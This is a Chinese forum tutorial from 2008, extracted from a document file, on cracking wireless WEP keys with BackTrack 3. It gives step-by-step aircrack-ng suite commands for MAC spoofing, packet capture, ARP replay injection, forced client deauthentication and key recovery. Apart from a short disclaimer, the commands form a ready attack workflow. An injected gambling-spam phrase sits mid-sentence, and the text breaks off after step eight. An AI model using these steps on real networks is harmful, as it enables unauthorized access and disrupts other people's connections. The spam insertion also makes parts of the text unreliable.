BT3破解无线WEP_WPA2.doc

BT3破解无线WEP_WPA2 声明：任何不经别人同意而进入别人网络都是非法和不道德的行为。 本教程用于学习和交流，如要实验请拿自已的AP开刀！！ 题记： 本人是中国无线门户无线安全版块ID “David98”，首先感谢版主longas还有像liyg、hrb011011、wifi和小 草等众多热心坛友的支持。 无线安全版块一直是本坛一个特殊而重要的版块，本版高手如 云，各类无线破解教程纷呈，但一直缺乏一个系统、全面而可理解和 学习的教程。我根据各位坛友的教程和自己的理解整理编辑成这篇 《BT3破解无线WEP/WPA教程》。 由于本人也是初学者，缺乏专业的理论知识，因此文中不免存在理 解的偏差甚至错误，希望各位朋友指正。 最后希望更多的朋友参与到教程的整理和编辑中，不断把教程修 正和完善。 对无线WEP和WPA 破解有兴趣的朋友也可加入QQ群:起交流。 谢谢！！ David98 08年5月22日 中国无线门户David98出品 Anywhere WLAN!! 3 WEP破解 1．装备： IMBX60笔记本（内置Intel3945 无线网卡）、BT3 的U盘系统（需用syslinux命令来指定启动 BT3 的盘符） 2．用户名：root密码：toor，进入图形界面：startx。启动BT3 后,(启动黑屏：xconf再输入startx) 3．加载3945 网卡的驱动。打开一个shell 输入 modprobe –r iwl3945 输入 modprobe ipwraw 注：不同的网卡有不同的加载方式 4． 查找目标： 用Airoscript命令（Backtrack/radio network analysis/80211/all/Aioscript）的扫描功能 连续三次都选择1 发现5个，有4 个加密，data 都是0，开放的netgear 那个AP有一个客户端。PWR 值一般看出信号强度。也可以用airodump-ng wifi0 来有哪些信誉好的足球投注网站 我们选择第一个作为目标，channel为11（上图中的CH 代表信道）。 中国无线门户David98出品 Anywhere WLAN!! 4 注：修改自己网卡的MAC地址的命令。 输入macchanger –m 00:11:22:33:44:55 wifi0 5．激活网卡的Monitor模式并工作在11 信道。（加载网卡，激活监听模式，工作在11 信道） 输入 airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。 可用aireplay-ng --test wifi0 来测试是否可以注入 中国无线门户David98出品 Anywhere WLAN!! 5 6．输入截取数据包命令（截取11 信道的ivs数据包，并保存名为name.ivs） 输入命令 airodump-ng --ivs -w name -c 11 wifi0 ， （--ivs：仅截取ivs数据包，-w：写入文件，-c：截取ivs的信道） （其中name是获取的ivs 的保存文件的名字，11 是channel值，你根据实际修改） 一. 有客户端WEP 破解 1．有客户端，且合法客户端产生大量有效的数据，能直接获得大量IVS。 思路：1-6步同上 7．直接用aircrack-ng破解 第七步： aircrack-ng -n 64 -b ap mac name-01.ivs 中国无线门户David98出品 Anywhere WLAN!! 6 2．有客户端，合法客户端只能产生少量ivs 数据，就需要注入攻击加速产生大量ivs。 只要有少量的数据就可能获得arp 请求包，则可用arp 注入模式的-3 模式通过不断向AP 发送 同样的arp请求包，来进行注入式攻击。 思路：1-6步同上 7．用aireplay-ng的arp注入方式获得大量的ivs 第七步：aireplay-ng -3 -b ap mac -h 合法客户端 mac wifi0 注：这一步可能时间会长一点，因为需要等到ARP。 中国无线门户David98出品 Anywhere WLAN!! 7 3．有客户端，但是客户端根本不在通信，不能产生ARP包。-3注入模式不成功 思路：1-6步同上 7．-0 冲突模式强制断开合法客户端和ap连接，使之重新连接 8．利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入 第七步：aireplay-ng -3 -b ap mac -h 合法客户端 mac wifi0 第八步：aireplay-ng -0 10 –a ap mac -c 合法客户端 mac wifi0 中国无线门户David98出品 Anywhere WLAN!! 8 4